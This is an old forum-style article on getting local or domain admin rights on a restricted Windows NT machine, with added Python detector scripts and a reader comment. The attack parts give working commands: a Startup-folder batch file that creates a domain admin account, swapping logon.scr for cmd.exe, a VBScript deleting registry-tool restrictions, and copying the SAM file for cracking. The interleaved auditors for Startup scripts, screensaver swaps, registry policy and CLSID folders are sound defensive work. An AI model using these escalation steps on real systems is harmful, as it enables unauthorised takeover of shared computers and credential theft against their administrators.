getting admin rights on a local nt box.
How to get admin
This article contains ideas and techniques to get admin on your local Windows machine. Please note that not all of them might work. I have found and tested some of them, and others I have found on the internet.
Please note that sub-techniques are also listed at the end of the article; these cover ways to get admin tools, the control panel and the command prompt. Some of these sub-techniques may be used in the main techniques.
Technique 1
This is an idea that I thought up, although recently I have seen it on the internet, so it's not an original idea. It involves putting a batch script in the admin Startup folder. The batch script will then create a user that is in the admin group. This might not work, but there is a technique you can use so that you can write to the C:\ drive. If you can write to C:\ then there is nothing to worry about.
First open Notepad or a similar program.
Then enter this code:
@echo off
net user <username> <password> /active:yes /domain /add
net localgroup Administrators <username> /add
net group "Domain Admins" <username> /add /domain
net group "Guests" <username> /delete /domain
Now save the text file as <name>.bat
Next we have to save it to the admin's Startup folder.
There are two ways to copy the file: you can just copy and paste it into the folder if you have access, or use the command prompt. The command prompt is usually blocked, but I will go over that later on.
The folder is usually C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\.
If you can't copy and paste the program, then you could try using a .bat file. Just do the same as before, except enter (the path contains spaces, so it has to be quoted):
copy <name>.bat "C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\"
Then just double-click it. Also, this batch file must be in the same directory as the batch file that it is copying.
Then you just have to wait for an admin to log in.
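From the admin's side, the thing to watch for with this technique is a script file sitting in the shared Startup folder, because nothing a normal user drops there should be creating accounts. Here is an added example (my own code, not part of the original article) that audits a Startup folder: it ignores shortcuts and documents, reports every script file, and flags the ones that run net user / net localgroup / net group with /add or /delete. The folder path is the one from the article; the demo builds a constructed folder in a temp directory so it runs anywhere.

```python
import re
import tempfile
from pathlib import Path

# Assumption for this example: the shared Startup folder is the one named in the
# article; on a real box pass the actual path to audit_startup_folder().
ALL_USERS_STARTUP = r"C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup"

# Script types that run when an interactive logon processes the Startup folder.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".wsf"}

# "net user/localgroup/group ... /add|/delete": account or group-membership changes,
# which an unattended startup script has no business making.
ACCOUNT_CMDS = re.compile(
    r"^\s*net\s+(user|localgroup|group)\b.*\s/(add|delete)\b",
    re.IGNORECASE | re.MULTILINE,
)


def audit_startup_folder(startup_dir):
    """Return (filename, reason) findings for every script in a Startup folder.

    Shortcuts (.lnk) and plain documents are ignored; any script file is reported,
    and one that changes accounts or group membership is reported as such.
    """
    findings = []
    for entry in sorted(Path(startup_dir).iterdir(), key=lambda p: p.name.lower()):
        if not entry.is_file() or entry.suffix.lower() not in SCRIPT_EXTS:
            continue
        text = entry.read_text(errors="replace")
        if ACCOUNT_CMDS.search(text):
            findings.append((entry.name, "script adds or removes accounts or group members"))
        else:
            findings.append((entry.name, "script file in a shared Startup folder"))
    return findings


def demo():
    """Build a constructed Startup folder in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        startup = Path(tmp) / "Startup"
        startup.mkdir()
        # Constructed contents: a benign shortcut, a text file, a harmless cleanup
        # script, and a batch file shaped like the one in the article.
        (startup / "Office Startup.lnk").write_bytes(b"L\x00\x00\x00")
        (startup / "readme.txt").write_text("nothing to see here")
        (startup / "cleanup.cmd").write_text("@echo off\r\ndel /q %TEMP%\\*.tmp\r\n")
        (startup / "update.bat").write_text(
            "@echo off\r\n"
            "net user backdoor Passw0rd /add\r\n"
            "net localgroup Administrators backdoor /add\r\n"
        )
        return audit_startup_folder(startup)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

Pointing audit_startup_folder() at ALL_USERS_STARTUP on a real machine gives you the same report; the content check is only a second line, the actual fix is that non-admins should not have write access to that folder in the first place.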
Technique 2
This way is quite an obvious idea when you think about it. It involves replacing the screensaver with the command prompt. To do this you will need to be able to use the command prompt or use a batch file.
To make the batch file, simply do as before and enter:
copy C:\winnt\system32\logon.scr C:\winnt\system32\logon.scr.old
del C:\winnt\system32\logon.scr
copy C:\winnt\system32\cmd.exe C:\winnt\system32\logon.scr
Next we log out, then log back in. We now have to wait for the screensaver to start, and when it does we will get a command prompt with full admin rights.
But if we want to change it back (so no one else can get admin rights) we simply make another batch file and enter:
copy C:\winnt\system32\logon.scr.old C:\winnt\system32\logon.scr
We made a copy in the first line of the batch file that replaces the screensaver with the command prompt so that we can change it back. We must always remember to make backups of things we change… it's not nice for the real admins.
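A swapped logon screensaver is easy to spot once you know what to look for: the file is byte-for-byte cmd.exe, it is a console-subsystem binary rather than the GUI binary a real .scr is, it no longer matches a known-good hash, and the logon.scr.old backup from the article is still lying next to it. Here is an added example (my own code, not from the original article) that checks all four. The PE Subsystem values are the ones from the PE/COFF spec; the demo writes constructed PE-shaped blobs (not real executables) into a temp directory, so the known-good hash and the file paths are assumptions for the demo only.

```python
import hashlib
import struct
import tempfile
from pathlib import Path

# PE optional-header Subsystem values (PE/COFF spec).
SUBSYSTEM_GUI = 2      # what a real screensaver is built as
SUBSYSTEM_CONSOLE = 3  # what cmd.exe is built as


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def pe_subsystem(path):
    """Return the Subsystem field of a PE file, or None if it is not PE-shaped."""
    data = Path(path).read_bytes()
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]       # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    opt_off = pe_off + 4 + 20  # past the signature and the 20-byte COFF header
    if len(data) < opt_off + 70:
        return None
    return struct.unpack_from("<H", data, opt_off + 68)[0]  # Subsystem: +68 in PE32 and PE32+


def check_logon_screensaver(system32, known_good_sha256=None):
    """Return a list of findings about logon.scr in the given system32 directory."""
    system32 = Path(system32)
    scr, cmd = system32 / "logon.scr", system32 / "cmd.exe"
    if not scr.is_file():
        return ["logon.scr is missing"]
    findings = []
    if cmd.is_file() and sha256_of(scr) == sha256_of(cmd):
        findings.append("logon.scr is byte-identical to cmd.exe")
    if pe_subsystem(scr) == SUBSYSTEM_CONSOLE:
        findings.append("logon.scr is a console-subsystem binary, not a screensaver")
    if known_good_sha256 and sha256_of(scr) != known_good_sha256:
        findings.append("logon.scr does not match the known-good hash")
    for leftover in sorted(system32.glob("logon.scr.*")):
        findings.append(f"backup copy left behind: {leftover.name}")
    return findings


def fake_pe(subsystem, tag):
    """Constructed minimal PE-shaped blob (not a runnable executable) for the demo."""
    pe_off = 0x40
    mz = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = b"\0" * 20
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 68, subsystem)  # Subsystem field
    return mz + b"PE\0\0" + coff + bytes(opt) + tag


def demo():
    """Constructed system32 where logon.scr was swapped for cmd.exe, as in the article."""
    good_scr = fake_pe(SUBSYSTEM_GUI, b"logon screensaver")
    cmd_exe = fake_pe(SUBSYSTEM_CONSOLE, b"command interpreter")
    with tempfile.TemporaryDirectory() as tmp:
        sysdir = Path(tmp)
        (sysdir / "cmd.exe").write_bytes(cmd_exe)
        (sysdir / "logon.scr.old").write_bytes(good_scr)  # the article's backup copy
        (sysdir / "logon.scr").write_bytes(cmd_exe)       # the swapped-in binary
        baseline = hashlib.sha256(good_scr).hexdigest()   # assumed known-good hash
        return check_logon_screensaver(sysdir, known_good_sha256=baseline)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real box you would call check_logon_screensaver(r"C:\winnt\system32", known_good_sha256=...) with a hash taken from install media; the subsystem check is the one that needs no baseline at all, since no screensaver is built as a console program.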
Technique 3
This is a widely used one. It involves downloading a live CD of Linux. A live CD is basically one you don't have to install and can run straight off the CD. The best ones for this are Knoppix or Phlak; you can get these free, just Google for them. After you burn one to a disc, pop it in the CD drive and it should boot up. On the desktop click on the hard drive icon and you should be in the "C:\" drive.
Go to:
C/WINNT/system32/config/
Now there should be a file called SAM. Copy that and put it on a floppy.
After that you should crack it. Google for SAM cracking programs.
You should mess about with Linux to get used to it first, though.
Sub-techniques
Getting the command prompt.
There are many ways to get this; it all really depends on the security.
One way is to go to:
Start > All Programs > Accessories > Command Prompt
But that will most probably not work.
Also you could try:
Start > Run > cmd
But that most probably won't work either.
Another way is to make a batch file. You just do the same as before, except type:
cmd
Getting regedit.
Regedit is usually blocked, but by renaming it you can sometimes get past the block. To rename it, simply make a batch file containing:
copy C:\WINNT\regedit.exe C:\WINNT\regedit.com
That is one way.
This is another way:
Open Notepad and enter:
On Error Resume Next 'Prevents errors from values that don't exist
Set WshShell = WScript.CreateObject("WScript.Shell")
'Delete DisableRegistryTools registry values
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
'display message
Message = "You should have access to Regedit now"
X = MsgBox(Message, vbOKOnly, "Done")
Set WshShell = Nothing
Now save it as anything.vbs
and now double-click on it and it should enable it.
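The admin's counterpart to that script is checking whether the DisableRegistryTools values are still where policy put them. Here is an added example (my own code, not from the original article) that reads a .reg export of the two policy keys named in the script and reports each one as enforced, disabled, value missing or key missing. It parses only the subset of .reg syntax it needs ([key] headers and "name"=dword:xxxxxxxx lines; a real export uses the long HKEY_* names, not the HKCU/HKLM shorthand). The sample export is constructed: the user has removed their own HKCU value, the HKLM one is intact.

```python
import re

# The two policy values the article's VBScript deletes (paths taken from the article,
# written with the full hive names that a .reg export uses).
POLICY_VALUES = {
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System": "DisableRegistryTools",
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System": "DisableRegistryTools",
}

KEY_LINE = re.compile(r"^\[(.+)\]$")
DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Parse [key] headers and "name"=dword:xxxxxxxx lines into {KEY: {name: int}}.

    Key paths are upper-cased so lookups are case-insensitive, like the registry itself.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1).upper()
            keys.setdefault(current, {})
            continue
        m = DWORD_LINE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def check_registry_tools_policy(reg_text):
    """Map each policy key to 'enforced', 'disabled', 'value missing' or 'key missing'."""
    keys = parse_reg_export(reg_text)
    status = {}
    for key, name in POLICY_VALUES.items():
        values = keys.get(key.upper())
        if values is None:
            status[key] = "key missing"
        elif name not in values:
            status[key] = "value missing"
        else:
            status[key] = "enforced" if values[name] == 1 else "disabled"
    return status


# Constructed export: the HKCU value has been deleted, the HKLM value is still set.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
"DisableRegistryTools"=dword:00000001
"""

if __name__ == "__main__":
    for key, state in check_registry_tools_policy(SAMPLE_EXPORT).items():
        print(f"{state:14} {key}")
```

The point the sample makes: a user can always delete values under their own HKCU, so a restriction that lives only there is not a control. The HKLM copy is the one that matters, and only because a normal user cannot write to that key.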
Control panel
To get the control panel… and other stuff… you use CLSIDs. This stands for class ID. These are codes that go at the end of a folder name.
To use the CLSIDs, make a folder and name it:
<anything>.<cls-id>, e.g.
control panel.{305CA226-D286-468e-B848-2B2E8E697B74}
Here is a list of more:
Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}
Control panel: {21EC2020-3AEA-1069-A2DD-08002B30309D}
Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}
Taskbar and start menu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}
Microsoft FTP folder: {63da6ec0-2e98-11cf-8d82-444553540000}
Temporary Internet files: {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
ActiveX Cache folder: {88C6C381-2E85-11D0-94DE-444553540000}
Subscriptions folder: {F5175861-2688-11d0-9C5E-00AA00A45957}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
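Folders renamed this way are easy to find, because the shell trick depends on the literal ".{GUID}" suffix. Here is an added example (my own code, not from the original article) that walks a profile directory, reports every folder carrying such a suffix, and labels it using the article's own list above; anything with a class ID not in that list is still reported, just as "unknown class id". The demo builds a constructed profile in a temp directory, so the paths in it are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

# CLSIDs from the article's list, used only to label what a renamed folder opens.
KNOWN_CLSIDS = {
    "2227A280-3AEA-1069-A2DE-08002B30309D": "Printers",
    "21EC2020-3AEA-1069-A2DD-08002B30309D": "Control Panel",
    "992CFFA0-F557-101A-88EC-00DD010CCC48": "Dial-up Networking",
    "D6277990-4C6A-11CF-8D87-00AA0060F5BF": "Scheduled Tasks",
    "6DFD7C5C-2451-11D3-A299-00C04F8EF6AF": "Folder Options",
    "0DF44EAA-FF21-4412-828E-260A8728E7F1": "Taskbar and Start Menu",
    "FF393560-C2A7-11CF-BFF4-444553540000": "History",
}

# A folder name ending in ".{GUID}" (the shell treats the suffix as a class id).
CLSID_SUFFIX = re.compile(
    r"\.\{([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}$"
)


def find_clsid_folders(root):
    """Walk root and return sorted (relative_path, label) for every CLSID-suffixed folder."""
    root = Path(root)
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            m = CLSID_SUFFIX.search(name)
            if not m:
                continue
            clsid = m.group(1).upper()          # GUIDs are case-insensitive
            label = KNOWN_CLSIDS.get(clsid, "unknown class id")
            rel = (Path(dirpath) / name).relative_to(root)
            hits.append((str(rel), label))
    return sorted(hits)


def demo():
    """Constructed profile: two renamed folders and one ordinary one."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Desktop" / "control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}").mkdir(parents=True)
        (root / "Desktop" / "Work Files").mkdir()
        (root / "My Documents" / "notes.{ff393560-c2a7-11cf-bff4-444553540000}").mkdir(parents=True)
        return find_clsid_folders(root)


if __name__ == "__main__":
    for path, label in demo():
        print(f"{label:24} {path}")
```

Run it over C:\WINNT\Profiles (or wherever user profiles live on the box) to get the same report for real users; the label is informational, the finding is the suffix itself.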
ghost 18 years ago
Hi.. I have a question… (sorry if this is not the best way/place to ask).. you typed "write to the C:&*92; drive" … does that c:&*92; actually mean "c:/"..
Other than that it looks like a very solid article.. cheers :D